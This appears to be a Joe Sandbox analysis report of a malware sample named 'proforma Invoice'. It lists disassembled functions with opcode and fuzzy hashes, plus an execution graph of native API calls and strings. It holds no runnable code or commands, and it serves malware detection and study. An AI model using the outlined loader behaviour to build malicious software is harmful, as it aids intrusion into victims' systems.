                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: yg-
                                                                          • API String ID: 0-1745838684
                                                                          • Opcode ID: d215fd01e2ccc52ec2515285b6d4b312b2a711a79454113ce027ec50495df31c
                                                                          • Instruction ID: c06c5d39a5faf6eba02b8c47afa5454e82e24994ce6c1f8cf5bb575b9d818fd0
                                                                          • Opcode Fuzzy Hash: d215fd01e2ccc52ec2515285b6d4b312b2a711a79454113ce027ec50495df31c
                                                                          • Instruction Fuzzy Hash: 98E11AB4E101198FCB14DFA9C580AAEFBF2FF89305F648169D409AB356D731A941CFA0
                                                                          Function 07D9B760 Relevance: .3, Instructions: 312COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 171e618293db5b707136eaa90c1ca44ddb0b871fc3dce9253665ed93e3fb3d4d
                                                                          • Instruction ID: 55c07acc6477f9289c40f76ddaad5d11fb6bb9e2eea298c29e0d6d181afd6dae
                                                                          • Opcode Fuzzy Hash: 171e618293db5b707136eaa90c1ca44ddb0b871fc3dce9253665ed93e3fb3d4d
                                                                          • Instruction Fuzzy Hash: 9FE10BB4E001598FCB14DFA9D580AAEFBF2FF89305F24816AD415AB359D731A941CFA0
                                                                          Function 07D92428 Relevance: .3, Instructions: 312COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dc9c45a412367dbfc232b08c55485b4279cf0025ff9db17be7d47aad6cb5267f
                                                                          • Instruction ID: a10b38d509c320dea972cf2dbdf277d68a7126767f0923695a7c4ebc00eae76a
                                                                          • Opcode Fuzzy Hash: dc9c45a412367dbfc232b08c55485b4279cf0025ff9db17be7d47aad6cb5267f
                                                                          • Instruction Fuzzy Hash: 55E1E7B4E011199FCB14DFA9C5809AEFBF2FF89305F248169D854AB35AD731A941CFA0
                                                                          Function 07D9A0B8 Relevance: .3, Instructions: 312COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 22cd942a45365bb4c118012f67cdd58a14766c83d21ccbff21c225e10d5c5948
                                                                          • Instruction ID: 6e3de29aa33e5b8c75b465ecdb799dcc5542a1ea982a0994d10adb8cf08bd6d1
                                                                          • Opcode Fuzzy Hash: 22cd942a45365bb4c118012f67cdd58a14766c83d21ccbff21c225e10d5c5948
                                                                          • Instruction Fuzzy Hash: 50E108B5E001298FCB14DFA9C580AAEFBF2BF89305F24C169D415AB356D731A941CFA0
                                                                          Function 07D99C80 Relevance: .3, Instructions: 312COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 935fe39b0172385631e4a83ccb3aed2dcf5c6933968ca68f0fe114091e809772
                                                                          • Instruction ID: 7a6e222f54721cab3103c3fed586b86c9ea12b77ed3b2c1f718d4b7f70c57cd0
                                                                          • Opcode Fuzzy Hash: 935fe39b0172385631e4a83ccb3aed2dcf5c6933968ca68f0fe114091e809772
                                                                          • Instruction Fuzzy Hash: 9FE12AB4E011198FCB14DFA9C5909AEFBF2FF89305F248169E415AB35AD731A941CFA0
                                                                          Function 07D99848 Relevance: .3, Instructions: 312COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d283ac0c1fc8621ea0ed72c0c9b244f75c02230b62db4bc584b8e0af9b93ff9d
                                                                          • Instruction ID: 38aee19e7287a7ae9d0c7b7ad9589a83913c7c60887a1a46d819d5d53ea9653b
                                                                          • Opcode Fuzzy Hash: d283ac0c1fc8621ea0ed72c0c9b244f75c02230b62db4bc584b8e0af9b93ff9d
                                                                          • Instruction Fuzzy Hash: BEE12DB4E001198FCB14DFA9C5909AEFBF2FF89305F248169D415AB355D731A941CFA0
                                                                          Function 0147D63C Relevance: .3, Instructions: 264COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2051913864.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1470000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4e70efa18f9e78ad72c929f87b388d376b1e438d3fa618ec0af6844c9961d845
                                                                          • Instruction ID: 3ff631b4f83ebab7946697915e51c4a932019c45f147fcf7c668202263a87379
                                                                          • Opcode Fuzzy Hash: 4e70efa18f9e78ad72c929f87b388d376b1e438d3fa618ec0af6844c9961d845
                                                                          • Instruction Fuzzy Hash: 96A17F36E002168FCF05DFB5C8405DEBBB2FF99304B15856AE915AB265DB31E91ACB80
                                                                          Function 07D932C8 Relevance: .2, Instructions: 169COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ce5458fbbc8ac89b27b72883df6dcbd188d70110779e00077b0b545d75e43a02
                                                                          • Instruction ID: ede13c13b97c94e329ad738a7790a16a166e21ee38dd08c596c4932ec620b92b
                                                                          • Opcode Fuzzy Hash: ce5458fbbc8ac89b27b72883df6dcbd188d70110779e00077b0b545d75e43a02
                                                                          • Instruction Fuzzy Hash: F47172B4E016198FDB04DFAAC9849DEFBF2BF89310F14D16AD419AB215DB349942CF50
                                                                          Function 07D932B7 Relevance: .1, Instructions: 128COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e4d10d1054b55e2b78c5bb0ab7c213891378939b4b1c2b0a7dce66b82b6548ee
                                                                          • Instruction ID: db7cda1017b266b1d5b34a4be3d597e91f3c964fff67fcbf58054fec82f5626c
                                                                          • Opcode Fuzzy Hash: e4d10d1054b55e2b78c5bb0ab7c213891378939b4b1c2b0a7dce66b82b6548ee
                                                                          • Instruction Fuzzy Hash: B45184B5E006198FDB08CFAAC94469EFBF2BF89310F14C16AD819AB354DB349946CF50
                                                                          Function 07D9DBE0 Relevance: .0, Instructions: 41COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1ceb994de3d9011e8e66172a61e3674524799609ecbb0587fb24a061947a2db6
                                                                          • Instruction ID: 9a4941dfcf0def9f5b0149aa3728e3ac5f99de7e224b72e18c15b82c1cd22432
                                                                          • Opcode Fuzzy Hash: 1ceb994de3d9011e8e66172a61e3674524799609ecbb0587fb24a061947a2db6
                                                                          • Instruction Fuzzy Hash: 8FF0F67595A118CACF24DF64E8447F8FBB8FB4B312F0024A6D84992251DB309984CF50
                                                                          Function 07D9DC44 Relevance: .0, Instructions: 31COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2066572335.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7d90000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d708e6107039b77faa94329c954bd1789da75fb1280f9856ac2b5bec4892e65c
                                                                          • Instruction ID: ef544a1ca044faeb80ac3228dc869659ff4d3cca563451556db383125cdf0e90
                                                                          • Opcode Fuzzy Hash: d708e6107039b77faa94329c954bd1789da75fb1280f9856ac2b5bec4892e65c
                                                                          • Instruction Fuzzy Hash: D5F01CB5A5B114DFCB50DB54E4045F8FBB8FB4B611F0130B6E84E97112DB3095448F54

                                                                          Execution Graph

                                                                          Execution Coverage:1.6%
                                                                          Dynamic/Decrypted Code Coverage:4.9%
                                                                          Signature Coverage:7.6%
                                                                          Total number of Nodes:144
                                                                          Total number of Limit Nodes:10
                                                                          execution_graph 69553 424da3 69555 424dbc 69553->69555 69554 424e04 69561 42e793 69554->69561 69555->69554 69558 424e44 69555->69558 69560 424e49 69555->69560 69559 42e793 RtlFreeHeap 69558->69559 69559->69560 69564 42c9d3 69561->69564 69563 424e14 69565 42c9ed 69564->69565 69566 42c9fe RtlFreeHeap 69565->69566 69566->69563 69567 413bc3 69568 413bc6 69567->69568 69569 413b3e 69567->69569 69569->69567 69572 42c8e3 69569->69572 69573 42c8fd 69572->69573 69576 11a2c70 LdrInitializeThunk 69573->69576 69574 413b45 69576->69574 69577 414083 69578 414090 69577->69578 69583 4177f3 69578->69583 69580 4140bb 69581 414100 69580->69581 69582 4140ef PostThreadMessageW 69580->69582 69582->69581 69584 417817 69583->69584 69585 417853 LdrLoadDll 69584->69585 69586 41781e 69584->69586 69585->69586 69586->69580 69587 413da3 69589 413dc9 69587->69589 69588 413df3 69589->69588 69591 413b23 LdrInitializeThunk 69589->69591 69591->69588 69592 418da8 69595 42c653 69592->69595 69594 418db2 69596 42c66d 69595->69596 69597 42c67e NtClose 69596->69597 69597->69594 69598 424a13 69599 424a2f 69598->69599 69600 424a57 69599->69600 69601 424a6b 69599->69601 69602 42c653 NtClose 69600->69602 69603 42c653 NtClose 69601->69603 69604 424a60 69602->69604 69605 424a74 69603->69605 69608 42e8b3 RtlAllocateHeap 69605->69608 69607 424a7f 69608->69607 69609 42f833 69610 42f843 69609->69610 69611 42f849 69609->69611 69614 42e873 69611->69614 69613 42f86f 69617 42c983 69614->69617 69616 42e88b 69616->69613 69618 42c9a0 69617->69618 69619 42c9b1 RtlAllocateHeap 69618->69619 69619->69616 69620 42bc33 69621 42bc4d 69620->69621 69624 11a2df0 LdrInitializeThunk 69621->69624 69622 42bc75 69624->69622 69625 41b2f3 69626 41b337 69625->69626 69627 41b358 69626->69627 69628 42c653 NtClose 69626->69628 69628->69627 69629 41e4f3 69630 41e519 69629->69630 69634 41e60d 69630->69634 69635 42f963 69630->69635 69632 41e5ab 69632->69634 69641 42bc83 69632->69641 69636 42f8d3 69635->69636 69637 42f930 69636->69637 69638 42e873 RtlAllocateHeap 69636->69638 69637->69632 69639 42f90d 69638->69639 69640 42e793 RtlFreeHeap 69639->69640 69640->69637 69642 42bc9d 69641->69642 69645 11a2c0a 69642->69645 69643 42bcc9 69643->69634 69646 11a2c1f LdrInitializeThunk 69645->69646 69647 11a2c11 69645->69647 69646->69643 69647->69643 69648 414114 69649 414118 69648->69649 69650 4140b7 69648->69650 69651 414100 69650->69651 69652 4140ef PostThreadMessageW 69650->69652 69652->69651 69653 11a2b60 LdrInitializeThunk 69654 401c1d 69655 401c26 69654->69655 69658 42fd03 69655->69658 69656 401c91 69656->69656 69661 42e2e3 69658->69661 69662 42e32c 69661->69662 69673 4075e3 69662->69673 69664 42e342 69672 42e39e 69664->69672 69676 41b103 69664->69676 69666 42e361 69669 42e376 69666->69669 69691 42ca23 69666->69691 69687 428303 69669->69687 69670 42e390 69671 42ca23 ExitProcess 69670->69671 69671->69672 69672->69656 69675 4075f0 69673->69675 69694 416513 69673->69694 69675->69664 69677 41b12f 69676->69677 69705 41aff3 69677->69705 69680 41b174 69682 41b190 69680->69682 69685 42c653 NtClose 69680->69685 69681 41b15c 69683 41b167 69681->69683 69684 42c653 NtClose 69681->69684 69682->69666 69683->69666 69684->69683 69686 41b186 69685->69686 69686->69666 69689 428364 69687->69689 69688 428371 69688->69670 69689->69688 69716 418653 69689->69716 69692 42ca3d 69691->69692 69693 42ca4e ExitProcess 69692->69693 69693->69669 69695 41652d 69694->69695 69697 416543 69695->69697 69698 42d0c3 69695->69698 69697->69675 69700 42d0dd 69698->69700 69699 42d10c 69699->69697 69700->69699 69701 42bc83 LdrInitializeThunk 69700->69701 69702 42d16c 69701->69702 69703 42e793 RtlFreeHeap 69702->69703 69704 42d185 69703->69704 69704->69697 69706 41b0e9 69705->69706 69707 41b00d 69705->69707 69706->69680 69706->69681 69711 42bd23 69707->69711 69710 42c653 NtClose 69710->69706 69712 42bd3d 69711->69712 69715 11a35c0 LdrInitializeThunk 69712->69715 69713 41b0dd 69713->69710 69715->69713 69718 41867d 69716->69718 69717 418b8b 69717->69688 69718->69717 69724 413d03 69718->69724 69720 4187aa 69720->69717 69721 42e793 RtlFreeHeap 69720->69721 69722 4187c2 69721->69722 69722->69717 69723 42ca23 ExitProcess 69722->69723 69723->69717 69728 413d23 69724->69728 69726 413d8c 69726->69720 69727 413d82 69727->69720 69728->69726 69729 41b413 RtlFreeHeap LdrInitializeThunk 69728->69729 69729->69727

                                                                          Executed Functions

                                                                          Function 004177F3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 222 4177f3-41781c call 42f373 225 417822-417830 call 42f973 222->225 226 41781e-417821 222->226 229 417840-417851 call 42ddb3 225->229 230 417832-41783d call 42fc13 225->230 235 417853-417867 LdrLoadDll 229->235 236 41786a-41786d 229->236 230->229 235->236
                                                                          APIs
                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417865
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475264775.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_proforma Invoice.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Load
                                                                          • String ID:
                                                                          • API String ID: 2234796835-0
                                                                          • Opcode ID: 2c219f7c767eb9b28ee7cd55e6e12fca76fdadb7cb09fab620ab4446465a0343
                                                                          • Instruction ID: 2ce8ff68d09b45714d63913b0514ef13c1845fd593f41c3a2cd435c83123a1a3
                                                                          • Opcode Fuzzy Hash: 2c219f7c767eb9b28ee7cd55e6e12fca76fdadb7cb09fab620ab4446465a0343
                                                                          • Instruction Fuzzy Hash: 590152B1E4020DB7DF10EAA1DC42FDEB3789B14308F4041A6ED0897240F634EB58C795
                                                                          Function 0042C653 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 247 42c653-42c68c call 404a93 call 42d8b3 NtClose
                                                                          APIs
                                                                          • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C687
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475264775.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_proforma Invoice.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID:
                                                                          • API String ID: 3535843008-0
                                                                          • Opcode ID: 238c78508bed0e6f854b915faa3d91bc94ed0096435d2cdf997d36a67c8fcb6c
                                                                          • Instruction ID: f79262d72201e0e60c0a3d96aaf994aae0b1b28e6a59d1ed98bd2ddbb89cd5e2
                                                                          • Opcode Fuzzy Hash: 238c78508bed0e6f854b915faa3d91bc94ed0096435d2cdf997d36a67c8fcb6c
                                                                          • Instruction Fuzzy Hash: EDE04F757402147BD610EA9ADC01F9BB76CDFC5714F004019FA18A7281C671B9118BF5
                                                                          Function 011A35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 23b1a9a4bb8826e1e5689b1772c966257da98445c8cfade0a294026b477d51b4
                                                                          • Instruction ID: 0edf157ae0feb3508091aa36c857cc3258d86e7070d082290c6571d1c58bf081
                                                                          • Opcode Fuzzy Hash: 23b1a9a4bb8826e1e5689b1772c966257da98445c8cfade0a294026b477d51b4
                                                                          • Instruction Fuzzy Hash: 0E90023160550402D10471684A54746100997D0601F65C411E0426568DC7958A516AA2
                                                                          Function 011A2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 261 11a2b60-11a2b6c LdrInitializeThunk
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 7928f55a116bfd9384bd2bcc107cdd1a9c39bd2986e3360327195a647ebf061d
                                                                          • Instruction ID: 5a0465e37bd9acce708244322f777a07854ad6122fe68f7af3ae650234435b0a
                                                                          • Opcode Fuzzy Hash: 7928f55a116bfd9384bd2bcc107cdd1a9c39bd2986e3360327195a647ebf061d
                                                                          • Instruction Fuzzy Hash: E890026120240003410971684954656400E97E0601B55C021E1016590DC62589916625
                                                                          Function 011A2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 263 11a2df0-11a2dfc LdrInitializeThunk
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 0d886eaa839fd664edb02cb702c561c49dbeadd71948755573a6309df6c50454
                                                                          • Instruction ID: b4c8c644fb4d459d3860b157ddb2bec7ff8570f7c25af57f95368c40d61088a1
                                                                          • Opcode Fuzzy Hash: 0d886eaa839fd664edb02cb702c561c49dbeadd71948755573a6309df6c50454
                                                                          • Instruction Fuzzy Hash: 0A90023120140413D11571684A44747000D97D0641F95C412E0426558DD7568A52A621
                                                                          Function 011A2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 262 11a2c70-11a2c7c LdrInitializeThunk
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: a98a69c64dac4c0616014016c74de37fd20a6c91e95b1fc12e0f9ece4160e683
                                                                          • Instruction ID: 51898f732e965affa0dcd29942b301877e49e9850fadbe0f2acb07917bc89878
                                                                          • Opcode Fuzzy Hash: a98a69c64dac4c0616014016c74de37fd20a6c91e95b1fc12e0f9ece4160e683
                                                                          • Instruction Fuzzy Hash: 5F90023120148802D1147168894478A000997D0701F59C411E4426658DC79589917621
                                                                          Function 00413FA2 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 0 413fa2-413fac 1 413fd1-413fd2 0->1 2 413fae 0->2 3 413fd4-413fdc 1->3 4 414037-414056 1->4 2->1 6 413fdd-413feb 3->6 7 413f86-413f8a 3->7 5 414058-414064 4->5 4->6 9 414065-414081 5->9 10 414017-414018 6->10 11 413fed 6->11 8 413f8b-413f8d 7->8 13 413f53-413f5d 8->13 14 413f8f-413f92 8->14 15 41401b-414022 10->15 11->15 16 413fef-413ffe 11->16 13->7 14->0 17 414090-4140ed call 42e833 call 42f243 call 4177f3 call 404a03 call 424ec3 15->17 18 414024-414026 15->18 16->2 19 414000-414001 16->19 32 41410d-414113 17->32 33 4140ef-4140fe PostThreadMessageW 17->33 18->9 20 414028-414036 18->20 19->8 22 414003 19->22 20->4 33->32 34 414100-41410a 33->34 34->32
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475264775.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_proforma Invoice.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Dgn$s002-5p$s002-5p
                                                                          • API String ID: 0-326510446
                                                                          • Opcode ID: 5610e1d9abbf3b5feeb2ba498749f12c53c180cb3e8539c8ad38d8c4714e54f5
                                                                          • Instruction ID: af3e7b8de85645b6cd955b89a5411ea0b75fcf488d0501c8713690a19e74f5f2
                                                                          • Opcode Fuzzy Hash: 5610e1d9abbf3b5feeb2ba498749f12c53c180cb3e8539c8ad38d8c4714e54f5
                                                                          • Instruction Fuzzy Hash: FA31FF72D041187FEF10DEA9D8419FE7FA8DFD5764F00446AE510A7301D6298A87C799
                                                                          Function 00414114 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68threadwindowCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 35 414114-414116 36 4140b7-4140c0 35->36 37 414118-41411f 35->37 40 4140c7-4140ed call 424ec3 36->40 41 4140c2 call 404a03 36->41 38 414121-414129 37->38 39 414142-414146 37->39 42 41412b-41412f 38->42 43 414159-41415c 39->43 44 414148-41414b 39->44 49 41410d-414113 40->49 50 4140ef-4140fe PostThreadMessageW 40->50 41->40 47 414131-414136 42->47 48 41414d-414153 42->48 44->43 44->48 47->48 51 414138-41413d 47->51 48->42 52 414155-414158 48->52 50->49 53 414100-41410a 50->53 51->48 54 41413f 51->54 53->49 54->39
                                                                          APIs
                                                                          • PostThreadMessageW.USER32(s002-5p,00000111,00000000,00000000), ref: 004140FA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475264775.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_proforma Invoice.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID: s002-5p$s002-5p
                                                                          • API String ID: 1836367815-979023209
                                                                          • Opcode ID: 2004a2f5e5a8bb523dd4c5c978743418ac97622185ca0d061fdb48c6dbf17371
                                                                          • Instruction ID: 100e8e29478d8f210fc824b2ce33949e2aa08dff37cc6dd6d2884f7ee3d1bbb0
                                                                          • Opcode Fuzzy Hash: 2004a2f5e5a8bb523dd4c5c978743418ac97622185ca0d061fdb48c6dbf17371
                                                                          • Instruction Fuzzy Hash: 24115E71C001487DDF205E748C84DFB7B6D9EA23A8B48429FE510DB3A2C2398DC6CB59
                                                                          Function 00414083 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • PostThreadMessageW.USER32(s002-5p,00000111,00000000,00000000), ref: 004140FA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475264775.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_proforma Invoice.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID: s002-5p$s002-5p
                                                                          • API String ID: 1836367815-979023209
                                                                          • Opcode ID: 1cf14d4b6567c94e39c004e87c1ad0b090585aa86234257e236a47f0aaa3e222
                                                                          • Instruction ID: 79950ae8218b7a60c02b67b575f51a5d31630f0c15ae353de40f050eb0526b10
                                                                          • Opcode Fuzzy Hash: 1cf14d4b6567c94e39c004e87c1ad0b090585aa86234257e236a47f0aaa3e222
                                                                          • Instruction Fuzzy Hash: 1701D6B1D0121C7EEB10AAE19C81DEFBB7CDF81398F408069FA14A7240D6785E068BF5
                                                                          Function 00417892 Relevance: 1.5, APIs: 1, Instructions: 49libraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 213 417892-41789a 214 417857-417867 LdrLoadDll 213->214 215 41789b-4178b2 213->215 216 41786a-41786d 214->216 215->215 217 4178b4 215->217 218 4178b7 217->218 219 4178cd-4178d2 217->219 220 417901-417907 219->220 221 4178d4-4178f1 219->221 221->220
                                                                          APIs
                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417865
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475264775.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_proforma Invoice.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Load
                                                                          • String ID:
                                                                          • API String ID: 2234796835-0
                                                                          • Opcode ID: a2ede0a05b9cc6e92daf99c51b20419e574181b552d31cd8fd50e09fdf8ae0b7
                                                                          • Instruction ID: 88c257fe231ed8b8c9cac90da85555ff8419b4f5cefb42a4719f8c0a04e025e1
                                                                          • Opcode Fuzzy Hash: a2ede0a05b9cc6e92daf99c51b20419e574181b552d31cd8fd50e09fdf8ae0b7
                                                                          • Instruction Fuzzy Hash: DF01763564D309EFD755DB84C882BD0BB34FB41710FA001CAD940AB743C6626980CBE1
                                                                          Function 0042C9D3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 242 42c9d3-42ca14 call 404a93 call 42d8b3 RtlFreeHeap
                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,C78BFC45,00000007,00000000,00000004,00000000,004170D1,000000F4), ref: 0042CA0F
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475264775.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
